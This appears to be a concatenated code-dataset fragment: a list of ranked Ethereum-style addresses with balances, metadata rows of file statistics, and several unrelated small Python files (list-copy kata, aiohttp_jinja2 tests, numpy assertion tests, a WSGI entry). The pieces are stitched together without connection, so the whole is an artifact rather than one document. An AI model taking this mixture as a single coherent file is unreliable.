(829, '0x35ea3291a3ea6eaeaaceb1d2f55177211fe3a27b', 253.57168199),
(830, '0x696883cea7a9ce83a4a276a8f3447dfacc65f466', 253.43440225),
(831, '0x263c2192b5b5f2f4b9f54c7561dc94f62b02317c', 252.65705132),
(832, '0x71fccfa917bb4e1abed5b4b3583654853dea1314', 252.1714818),
(833, '0x688008d2d8ae40311a79f568b18f017b0dc41c47', 250.75211525),
(834, '0xbdf985751c613fce4d241991156cb620d671c3ed', 250.65694903),
(835, '0x7fa344092bcca779841161ee041c3bdd3b577326', 250.53242136),
(836, '0x1b04fae81f45711d3b9b60927228940e6d87e343', 250.518336),
(837, '0xdc0f4fbf2b17dc2d70f02fbcdbb307379d377c7d', 250.0),
(838, '0x6e54343f00759f70c22f25cefb489afe072f9366', 250.0),
(839, '0x5ceaf18e7736bc532ba1253fe232c54ace53f243', 250.0),
(840, '0xa5ff04a8470824ded263fe695607858a6f6489d5', 250.0),
(841, '0x1f6ca49f0f6c186f469ca3c9adb1aa2354c21349', 250.0),
(842, '0xc850771a21795dd2217b43e68e07b879733877af', 250.0),
(843, '0x3849f0be9065d2bea90286c5baa3fb3c452fbcda', 249.49),
(844, '0xbcb9d0a1b88d7d50872a3c078539c5b8d314c91a', 249.27975219),
(845, '0xc87bca32273fc032d317359d4a8c5101e200a5f2', 248.9413691),
(846, '0xa47317a4fb1e47db3446cf755f6c2ddef023f2da', 248.78605206),
(847, '0x5c634233f886e73356698357a0f663744e684d35', 248.74904054),
(848, '0x8e4583ddc2e3047c83a4349bea0e802c20483ddb', 247.24725949),
(849, '0x891a193143994c0e7c3848c94a1c976098627370', 246.7708703),
(850, '0x05deb29f9478fd9fe90d1502e9715c024543cc75', 245.0),
(851, '0x7ff296c8893fe90bc7777fb68507f916ec850b6f', 244.31835159),
(852, '0x7b975dcb0bb60cb7201a4e577d13b8be74f85b1a', 244.0),
(853, '0xe45d8ceef899167cd9eae296717caa15a0330093', 243.27583841),
(854, '0x5886fea558dfd941bed22c0250570f7557d0032c', 242.97679458),
(855, '0x23bfda964df4e3a810156c3180938de7b738d189', 242.53253113),
(856, '0x3410abb8a055eae945e1e48f5b4f07663cdd0821', 242.51406073),
(857, '0xf6637e95eddcd0a624459a3477c8d65d41f57ada', 241.99664073),
(858, '0x9258355010cced4b3e563e22868689aabbbdd728', 241.32270153),
(859, '0x607d6da90fbe246fd192db700726ff88555b56ac', 239.89406805),
(860, '0x4de5898734d93f72ce1003382a90e1bd511d9067', 237.91641884),
(861, '0x499acbeb70e2e52536139b2a8b2bca708f5f75e3', 237.28032601),
(862, '0x640d0d3c17a253d0b9fca05633b2b3efb9db473b', 236.90341613),
(863, '0xa231ce4ccb9daeea47d2af82a3ba290f628de6f8', 235.65849253),
(864, '0xd6ceae2756f2af0a2f825b6e3ca8a9cfb4d082e2', 234.57736574),
(865, '0x197b6b24a38664e662556594d35a8e108a34f139', 233.48768373),
(866, '0x86e346e5c52231c44cca1a07ff00254fc252f838', 232.70397227),
(867, '0x621c6bca87a6b81aa38082882d259d735cc9effe', 232.27358929),
(868, '0xcb13ac2a86986445c6104395bcee9f9f31b8324b', 231.40125181),
(869, '0xf986d16186e5a2eddc5f0d36868a1362b3f60dfd', 231.28528812),
(870, '0x934c80e3a3e9136ee3558950385b66ac5e7d9bf7', 229.61868108),
(871, '0xd4f0c99939cba33866bad85d545431b8cc746ea8', 228.93969259),
(872, '0x41c753bc90ae6cc015d9bcbac0647f9dce07dabb', 227.78130521),
(873, '0x0ac807bafd8cfbeff973bb1244c7ffa22a348b6e', 227.08288317),
(874, '0xa044c5ae34305784c9918d5e5fbea5ab3251d3aa', 226.79998164),
(875, '0xaa9bf46053f9e48085743832747f7ad50a5c58ff', 226.63431746),
(876, '0xf89e3fc305dfe636a67a13c6f790b7e62bce8828', 226.20496714),
(877, '0xb103d4b9a5fd9ca8a5ff12df0c5bca3fafe423fc', 225.45282429),
(878, '0x93da7b2830e3932d906749e67a7ce1fbf3a5366d', 224.98856875),
(879, '0x51ebe95db3c6272f2d8747d0ccd675a438d1dc12', 224.3672468),
(880, '0x22901d4fe237dd8154a502d282100f5b11cdd6fb', 223.41457311),
(881, '0xb2b00ef96e88b74e822765f0ad4d200c0ec8c99e', 223.41286558),
(882, '0x9d815a79eccccec71c7527b715143411648ac49c', 222.59749324),
(883, '0xfe7dabdafa8c46c21372b6b22260f7c96f9c56c5', 222.26848029),
(884, '0xd7053daa42729d66cf4f7921298550f95123a965', 221.9319662),
(885, '0x23fa2c9cc4f07015476f55aaf384a2678b7d29f3', 221.82741243),
(886, '0x99c0936f5e6a753820d2827f24b72f187c1106a9', 221.60595416),
(887, '0xf99c1f71aea3038bb1810469c25b6a01fb546371', 221.15441737),
(888, '0x6c9fd210f5efd839e9dcb4e09ee0d46e34dce002', 221.13915623),
(889, '0xc66b4d7f9384f35e7bd053ff427192ef877c98be', 220.86786603),
(890, '0x503e3339e388c741c8ceb2aad7a97eae45bb50f8', 220.61341751),
(891, '0xb09b35090b92363d0cf8ac189fba035d5a1453b8', 216.84507538),
(892, '0x0118ddd72f1d0a8eb42de4fbb6232aa37e0abe86', 216.78860567),
(893, '0xbce65e09c1191d995595c26c86402f06aa574309', 213.0),
(894, '0xe5cdb94682fb41e4088dcd5ee921fb75b23f2424', 212.8276674),
(895, '0x2217aab331a33279b47e811da0d799438e5da2c3', 212.37242678),
(896, '0x7d468e6b8c66d2d063d5e6ce7c3b700915821a59', 212.28133),
(897, '0x7724e403a474fb04b0580449f6fcf8cbb1c8ce1d', 211.45798442),
(898, '0x2107f780671b0a5026c3a8afef77ce16420cb639', 210.94519303),
(899, '0x2b4b2182413713869b4ff29b7bfe9be715400ce1', 210.91284422),
(900, '0x63743b09ed50edfdfb4861df82912ae060d9c7b2', 210.57426299),
(901, '0x97ae2c1ba8a514d7f2c668005a07b2666613cdfb', 210.0),
(902, '0xb322c32b6d07d5e4db4a96e0385cf8ea22eec7b4', 209.98830491),
(903, '0x9fdd25b93d56f3f408a95a6c5491021f7f81df5a', 209.75111495),
(904, '0x438bab3c37a910e2262f0b580580925f142ebe65', 207.95118658),
(905, '0xfd21c90bbee9af68bdafd973669798d15b502122', 207.56102775),
(906, '0x130f3c00d8c86a3bd97c0308c514dd4cf82790c7', 206.52814309),
(907, '0x26647cba8c8c727e46277e910303a9ec72b9890a', 206.34524689),
(908, '0x956d3fddf2b1ae4820acf0cab97d85993d3cbb30', 206.328),
(909, '0x90ec7509182ed43c59877ece2bfb4916399de648', 206.0),
(910, '0xb0cbd09e8e4c93349a7eba3e854fc732c70d29fa', 204.9370959),
(911, '0xe88d1a3ecd62b3b98172c7b4dd289410df1e1edb', 204.4163495),
(912, '0xebad0b51a67fd5078aa964ef42b176abcd4399aa', 202.63466332),
(913, '0x685ec035fc06e31952ab33008871e2eebbf8f9f5', 202.52584979),
(914, '0x713e2e915e6c56f4c18a63acdd168562f3094c05', 201.877),
(915, '0xd866c58dcea652649bab34628463f7478e525370', 200.06703557),
(916, '0x098733a634ef21ec265e82a343089355b4701750', 200.06428168),
(917, '0x07a0af3b01eb56f321732393a30d78e76d97f91e', 200.013),
(918, '0xe5510b4a1abfa1056950ca1f9f1ca8a9ec21b2a3', 200.0),
(919, '0x060e8b181ff896d7d32618df05a73fc390fe2b21', 200.0),
(920, '0x8c68c0843e11c62473a9a1d7d1f438d3abfdea8b', 200.0),
(921, '0x1c076672ef23e7d512ab9e3f38d286d869f57a9e', 200.0),
(922, '0x653855da596f237c53b2b84c1b4a182b146d293b', 200.0),
(923, '0x41877bbaac231d9b4902951823e95abe17861011', 200.0),
(924, '0xe130e14e487cc538ecc4c9830acdc2d430465cc6', 200.0),
(925, '0xc85ed90266447df9eca3bfc297b4adc4604b1daa', 200.0),
(926, '0xddfcdec21e2f63346db201560448046551d213a1', 200.0),
(927, '0x8688a84fcfd84d8f78020d0fc0b35987cc58911f', 200.0),
(928, '0xd3a23314f6210cbc4544dd4cfede22776dbb6106', 200.0),
(929, '0x87075773039e7c0ab18ac2843773d02c27f3216f', 200.0),
(930, '0xbb985902c457c623178efde482b2e08ac2f66106', 199.999999),
(931, '0xcc704b873485d9403168575ed4ef8307e8e9eb71', 199.73508499),
(932, '0x29170a4ca3b8f16aa7be54db0fb8c4bcd30b0788', 199.705),
(933, '0xc3c152b9f7b62f5bfec503642a7ee175ca81ce07', 199.53146357),
(934, '0xb48e1ccf81f9d46e8b1c90cdf39904d8afc7c2e2', 199.37300818),
(935, '0xf0fc218fd25bf4f2dc6a8f14f547598f07d720bc', 199.16829171),
(936, '0x449913dc43d70024a47a8fb8350c813fc60e9278', 199.10542388),
(937, '0xb74f7a631fe4010bf2e9ab77d6b8b68c66d41958', 198.26748818),
(938, '0x17adbb51a5b9c71bc28c18305829b18c17d32842', 198.15),
(939, '0xf5e78d6b32f020690376806674aa92635ca56092', 197.96461209),
(940, '0xf3ed7f993f17adecc5f90e2cfda35143d8e3e1ee', 196.85281744),
(941, '0xb5169e66cff142fc4f46a14ec3114be06568cb8b', 196.7109778),
(942, '0x39740327e50d724bcc2b61b7f30eccf9b27aafb9', 196.20195087),
(943, '0xcec2be5b446209c8b063fdcdb4c4c00cb8afaf42', 195.475),
(944, '0x780abe95d3d615331e1b35fad59a8838e9470002', 195.24575016),
(945, '0x820d47c953968902efa913f51f1bd1728f5ab72c', 195.12899999),
(946, '0x44f7981c0eeb4ca473f81618fc3f01c80cc57f0e', 194.18843183),
(947, '0x8b326cf10c8541bcf2cbba46e1e8112b0fc7f125', 194.05363187),
(948, '0x0ea196011005d0214630b04dae024117bb429a62', 194.02993027),
(949, '0x1d00ffffb205cc0c5a51e7c77a7668a8b90bbb90', 190.76014815),
(950, '0x3d64c731f0a0303e741d37796d38f3eb0768873a', 190.67720369),
(951, '0x298ac03fb6cd6dd37d53ca4813070bf5be5719d4', 190.12136741),
(952, '0x11e8dcab08519b56e015260d93e098e64f13a78b', 189.42195993),
(953, '0x7e3ca464db06ef577270e11e1b2d75b552099336', 188.76621809),
(954, '0x11174cb4dfe45467343a2716d76a5cd8309713ee', 188.70207649),
(955, '0x3bcc46e668d1a043b0485dc64f3460e4c37c26b3', 188.32497159),
(956, '0x565c9aa0eed9ac07d29b8d7e995df17b9ddfd149', 187.20113057),
(957, '0x78c1bba11c7521bc1da077562cb898f48f147bf0', 185.97341615),
(958, '0x2bb9cf7ae3891ebf753f30beb792550f0ebf14b1', 185.24678208),
(959, '0x40613a09b22f552aa41a47e8b6a64560a79fbfd6', 184.63057093),
(960, '0xa387aa404cdf08efe74b9ab7c517aaab5bc4c919', 184.30992759),
(961, '0x053aa1b9f6bb0de10b98b8af260b4d94eeb8b07f', 184.0),
(962, '0x1b3c4708dc734a373d5d6618d8a3f580b9eec9c6', 183.87385626),
(963, '0x5a84bc50cc4c47895dc01a76262df189989471ea', 183.55020985),
(964, '0x3f023cb4d9c93d912e37c1354ac5698c4496a0e2', 182.8169545),
(965, '0xc3f5dd9f16cacd7fdc799a2782e44217e7b456d1', 182.44702526),
(966, '0x9d56fc70d03d923ec6cdb5593021edeae48cc12b', 182.265),
(967, '0x5e14feb4a976491352284c0e3c69e7d6ae7d87f1', 181.330829),
(968, '0xa1ab7921c9fc01f443b7bb7f81dd67db5089ea18', 181.1254349),
(969, '0x8c24092bb23394f83cdd7520ff42c437e25a3c39', 181.0281608),
(970, '0xba8ad71f328c166f34a3ad43d59492cc87cc359b', 178.96271297),
(971, '0xacc6be7a640d780a91a6d1d8a9c1b701d07fed0e', 178.76940001),
(972, '0x2cfe2ecea89782df317068b5dc59b6cbfba38b76', 177.10490631),
(973, '0x3dca41eeb0f638a49f6976d34899f90149d85a35', 176.53929634),
(974, '0x786d28ff5cc2402024eeba8868fdc328d9e8e1af', 175.81733323),
(975, '0x7a47fa7b3820dfbd65ddc5d6647af225da856ce2', 175.0),
(976, '0x22ef324a534ba9aa0d060c92294fdd0fc4aca065', 174.91276511),
(977, '0x42ac579ca4324c216731c0cace0a9101a1c8411d', 174.83380574),
(978, '0xdf1d6965cd0929e2a9a7d553aaa9cfa57db76c54', 174.31822674),
(979, '0xeee1588794468afc4ac93a6f659c188bc8e28249', 173.3201683),
(980, '0x730f7f84f3d08bea0828d5d31e17fb41b4c71d85', 172.19889366),
(981, '0x1e12b94789113163f97f756ea2190c3f71dd55c5', 171.91497869),
(982, '0x31e4694c01aaf107fe7054724a91961ba93aff2b', 170.66619195),
(983, '0x0d3271dc3cb54e9e20092db0b60b07ceb1de62a4', 170.30549804),
(984, '0x31cc1f2bc8336ff2ebbd0dccff8347fb31a75260', 169.6063018),
(985, '0x38e3006f34d0425f78d67d5d043400edfe7dc040', 169.58827772),
(986, '0x942da83c7bb0b2133d29897588f4133d3062fc11', 169.41294761),
(987, '0x4f16e8946a2443bc4eb263d38212b7767e199ad7', 166.9114),
(988, '0x412a9425eff7b9eed4c8a88425190175018750e6', 165.9),
(989, '0x6ffc62a2e1fdba6330446d0c67db9b5b6dd1357b', 165.26242431),
(990, '0xeb50fd87ac700b6caa07a6743e515521beff2520', 165.05011228),
(991, '0xa359714e9fccee54025adda0e630b8293555e387', 165.0),
(992, '0xdf34d5f3b25b582fc05b2c6552a1ebb475fe2b31', 165.0),
(993, '0xf11b94cf137cb3f1aa972f8d4672cc51cc7564c7', 164.97736337),
(994, '0x71b8147f871f7aa31d3d324c65ba6be92df79cd5', 164.38781774),
(995, '0x3eb5820ce5d1d7299fdc885265442dfda58084ce', 162.0),
(996, '0xf21f468c31b1742d23fa47bd172e0bf48a2b5d8b', 161.94814128),
(997, '0x56fb8e41851daf7f90a628b644c9d29d5cd8cf18', 161.88919817),
(998, '0x73bd7221e670d1894629467cc4e5d32a0f0759ea', 161.35126783),
(999, '0x541c8e9fb13fe0a1065cda51a5248df2cc8f2afd', 161.0),
(1000, '0x7c3c734d0f46602606fe48d30ffd932ddf6296ac', 160.58399439)
) | 69.244267 | 71 | 0.783937 | 4,003 | 69,452 | 13.600799 | 0.77292 | 0.000882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.614287 | 0.100847 | 69,452 | 1,003 | 72 | 69.244267 | 0.257542 | 0 | 0 | 0 | 0 | 0 | 0.604734 | 0.604734 | 0 | 0 | 0.604734 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d55580dd9f11db25e396871fa31fd784862f8f6d | 149 | py | Python | CodeWars/2016/MakingCopies-7k.py | JLJTECH/TutorialTesting | f2dbbd49a86b3b086d0fc156ac3369fb74727f86 | [
"MIT"
] | null | null | null | CodeWars/2016/MakingCopies-7k.py | JLJTECH/TutorialTesting | f2dbbd49a86b3b086d0fc156ac3369fb74727f86 | [
"MIT"
] | null | null | null | CodeWars/2016/MakingCopies-7k.py | JLJTECH/TutorialTesting | f2dbbd49a86b3b086d0fc156ac3369fb74727f86 | [
"MIT"
] | null | null | null | #Take a list and return an exact copy.
def copy_list(l):
new_copy = l[:]
return new_copy
#Alternate Solution
def copy_list(l):
return list(l) | 14.9 | 38 | 0.711409 | 27 | 149 | 3.777778 | 0.481481 | 0.147059 | 0.215686 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187919 | 149 | 10 | 39 | 14.9 | 0.842975 | 0.369128 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6372109243b6a31042720d1e828d6479c8642b1a | 193 | py | Python | scripts/welcomeJudge.py | ChoiSangok/BaekJoon-Challenge | a75505064816935fc7d7955cc1eba94e9d84c6e5 | [
"MIT"
] | 3 | 2021-08-02T12:32:14.000Z | 2021-08-05T13:26:32.000Z | scripts/welcomeJudge.py | choipureum/BaekJoon-Challenge | 00604ddb6cb6e35d310ef2449d70f138db3f7314 | [
"MIT"
] | 24 | 2021-08-04T04:39:23.000Z | 2021-08-13T13:16:29.000Z | scripts/welcomeJudge.py | choipureum/BaekJoon-Challenge | 00604ddb6cb6e35d310ef2449d70f138db3f7314 | [
"MIT"
] | 2 | 2021-08-04T04:31:26.000Z | 2021-08-05T13:26:38.000Z | import os
import sys
print("[Welcome PR!]")
print("Please regist comment with Command")
print("run : run (path)/문제 테스팅(Success/Error)")
print(" ex) run test/Implementation/2857/main.java")
| 24.125 | 55 | 0.715026 | 29 | 193 | 4.758621 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023669 | 0.124352 | 193 | 7 | 56 | 27.571429 | 0.792899 | 0 | 0 | 0 | 0 | 0 | 0.678756 | 0.176166 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
63c1536396da054bb8e878fd4a8432563c320df7 | 4,668 | py | Python | tests/test_jinja_globals.py | ccxtechnologies/aiohttp-jinja2-async | e46c33fbf50a50cc4b3204c65556b8957e91cae0 | [
"Apache-2.0"
] | 3 | 2021-01-09T19:52:01.000Z | 2021-11-15T11:15:09.000Z | tests/test_jinja_globals.py | ccxtechnologies/aiohttp-jinja2-async | e46c33fbf50a50cc4b3204c65556b8957e91cae0 | [
"Apache-2.0"
] | null | null | null | tests/test_jinja_globals.py | ccxtechnologies/aiohttp-jinja2-async | e46c33fbf50a50cc4b3204c65556b8957e91cae0 | [
"Apache-2.0"
] | 1 | 2021-01-09T16:42:33.000Z | 2021-01-09T16:42:33.000Z | import jinja2
import pytest
from aiohttp import web
import aiohttp_jinja2
def test_get_env():
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2': "tmpl"}))
env = aiohttp_jinja2.get_env(app)
assert isinstance(env, jinja2.Environment)
assert env is aiohttp_jinja2.get_env(app)
async def test_url(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
async def other(request):
return
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('other', name='John_Doe')}}"}))
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/user/{name}', other, name='other')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/user/John_Doe' == txt
async def test_url_with_query(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('index', query_={'foo': 'bar'})}}"}))
app.router.add_get('/', index, name='index')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/?foo=bar' == txt
async def test_url_int_param(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
async def other(request):
return
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('other', arg=1)}}"}))
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/uid/{arg}', other, name='other')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/uid/1' == txt
async def test_url_param_forbidden_type(aiohttp_client):
async def index(request):
with pytest.raises(TypeError,
match=(r"argument value should be str or int, "
r"got arg -> \[<class 'bool'>\] True")):
aiohttp_jinja2.render_template('tmpl.jinja2', request, {})
return web.Response()
async def other(request):
return
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('other', arg=True)}}"}))
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/uid/{arg}', other, name='other')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
async def test_helpers_disabled(aiohttp_client):
async def index(request):
with pytest.raises(jinja2.UndefinedError,
match="'url' is undefined"):
aiohttp_jinja2.render_template('tmpl.jinja2', request, {})
return web.Response()
app = web.Application()
aiohttp_jinja2.setup(
app,
default_helpers=False,
loader=jinja2.DictLoader({
'tmpl.jinja2': "{{ url('index')}}"
}),
enable_async=False,
)
app.router.add_route('GET', '/', index)
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
async def test_static(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ static('whatever.js') }}"}))
app['static_root_url'] = '/static'
app.router.add_route('GET', '/', index)
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/static/whatever.js' == txt
async def test_static_var_missing(aiohttp_client, caplog):
async def index(request):
with pytest.raises(RuntimeError, match='static_root_url'):
aiohttp_jinja2.render_template('tmpl.jinja2', request, {})
return web.Response()
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ static('whatever.js') }}"}))
app.router.add_route('GET', '/', index)
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status # static_root_url is not set
| 26.827586 | 74 | 0.615895 | 558 | 4,668 | 5.014337 | 0.15233 | 0.083631 | 0.042888 | 0.054682 | 0.801644 | 0.766619 | 0.766619 | 0.73767 | 0.73767 | 0.702645 | 0 | 0.018757 | 0.23479 | 4,668 | 173 | 75 | 26.982659 | 0.764558 | 0.00557 | 0 | 0.669355 | 0 | 0 | 0.136207 | 0.009052 | 0 | 0 | 0 | 0 | 0.104839 | 1 | 0.008065 | false | 0 | 0.032258 | 0 | 0.120968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89301bc0dbd02a537b94193a54365521083a063e | 1,782 | py | Python | tests/misc/test_assertion.py | takuseno/mvc-drl | 2d9dede864d4018ec91a7d69c7435f885e5fc7d5 | [
"MIT"
] | 11 | 2019-02-10T07:00:34.000Z | 2020-08-03T12:49:28.000Z | tests/misc/test_assertion.py | takuseno/mvc-drl | 2d9dede864d4018ec91a7d69c7435f885e5fc7d5 | [
"MIT"
] | null | null | null | tests/misc/test_assertion.py | takuseno/mvc-drl | 2d9dede864d4018ec91a7d69c7435f885e5fc7d5 | [
"MIT"
] | 1 | 2019-02-10T07:00:34.000Z | 2019-02-10T07:00:34.000Z | import numpy as np
import pytest
from mvc.misc.assertion import assert_type
from mvc.misc.assertion import assert_shape
from mvc.misc.assertion import assert_batch_shape
from mvc.misc.assertion import assert_batch_size_match
from mvc.misc.assertion import assert_shape_match
from mvc.misc.assertion import assert_shape_length
from mvc.misc.assertion import assert_scalar
def test_assert_type():
with pytest.raises(AssertionError):
assert_type('error', int)
assert_type('error', str)
def test_assert_shape():
with pytest.raises(AssertionError):
assert_shape(np.random.random((4, 10)), (4,))
assert_shape(np.random.random((4, 10)), (4, 10))
def test_assert_batch_shape():
with pytest.raises(AssertionError):
assert_batch_shape(np.random.random((4, 10)), (11,))
assert_batch_shape(np.random.random((4, 10)), (10,))
def test_assert_batch_size_match():
with pytest.raises(AssertionError):
assert_batch_size_match(np.random.random((4, 10)), np.random.random((5, 10)))
assert_batch_size_match(np.random.random((4, 10)), np.random.random((4, 9)))
def test_assert_shape_match():
with pytest.raises(AssertionError):
assert_shape_match(np.random.random((4, 10)), np.random.random((4, 11)))
assert_shape_match(np.random.random((4, 10)), np.random.random((4, 10)))
def test_assert_shape_length():
with pytest.raises(AssertionError):
assert_shape_length(np.random.random((4, 10)), 3)
assert_shape_length(np.random.random((4, 10)), 2)
def test_assert_scalar():
with pytest.raises(AssertionError):
assert_scalar(np.random.random((4,)))
with pytest.raises(AssertionError):
assert_scalar(np.random.random((4, 10)))
assert_scalar(np.random.random((4, 1)))
| 29.213115 | 85 | 0.7211 | 260 | 1,782 | 4.726923 | 0.130769 | 0.110659 | 0.193653 | 0.195281 | 0.861676 | 0.786005 | 0.573637 | 0.5476 | 0.254679 | 0.254679 | 0 | 0.037279 | 0.141975 | 1,782 | 60 | 86 | 29.7 | 0.766514 | 0 | 0 | 0.205128 | 0 | 0 | 0.005612 | 0 | 0 | 0 | 0 | 0 | 0.948718 | 1 | 0.179487 | true | 0 | 0.230769 | 0 | 0.410256 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9820ed49c3c5dae122bbe7ea010f858ca94ba254 | 130 | py | Python | openpype/hosts/houdini/api/plugin.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/api/plugin.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/api/plugin.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | from avalon import houdini
from openpype.api import PypeCreatorMixin
class Creator(PypeCreatorMixin, houdini.Creator):
pass
| 18.571429 | 49 | 0.815385 | 15 | 130 | 7.066667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138462 | 130 | 6 | 50 | 21.666667 | 0.946429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
982d7e4b4c6f06ac1374e5acc6d921426d7ffdf5 | 163 | wsgi | Python | app.wsgi | drawcode/blueprints-flask | 742b33f68484b3688b0ef60c97a8fa8d22fea43c | [
"MIT"
] | 1 | 2017-11-01T02:55:11.000Z | 2017-11-01T02:55:11.000Z | app.wsgi | drawcode/blueprints-flask | 742b33f68484b3688b0ef60c97a8fa8d22fea43c | [
"MIT"
] | null | null | null | app.wsgi | drawcode/blueprints-flask | 742b33f68484b3688b0ef60c97a8fa8d22fea43c | [
"MIT"
] | null | null | null | import sys, os
sys.path.append(os.path.dirname(__file__))
sys.path.append(os.path.join(os.path.dirname(__file__), "app"))
from app import app as application | 27.166667 | 64 | 0.742331 | 27 | 163 | 4.185185 | 0.444444 | 0.159292 | 0.230089 | 0.265487 | 0.336283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110429 | 163 | 6 | 65 | 27.166667 | 0.77931 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
98327f17b8e00cdb5e6da77a05aeb8fa29944b14 | 49 | py | Python | models/detection/__init__.py | canyilmaz90/pytorch-YOLOv4 | 0217bccd2790a9c86e405a3d6d68071ff4db3775 | [
"Apache-2.0"
] | null | null | null | models/detection/__init__.py | canyilmaz90/pytorch-YOLOv4 | 0217bccd2790a9c86e405a3d6d68071ff4db3775 | [
"Apache-2.0"
] | null | null | null | models/detection/__init__.py | canyilmaz90/pytorch-YOLOv4 | 0217bccd2790a9c86e405a3d6d68071ff4db3775 | [
"Apache-2.0"
] | null | null | null | from .yolov4 import *
from .yolov4tiny import *
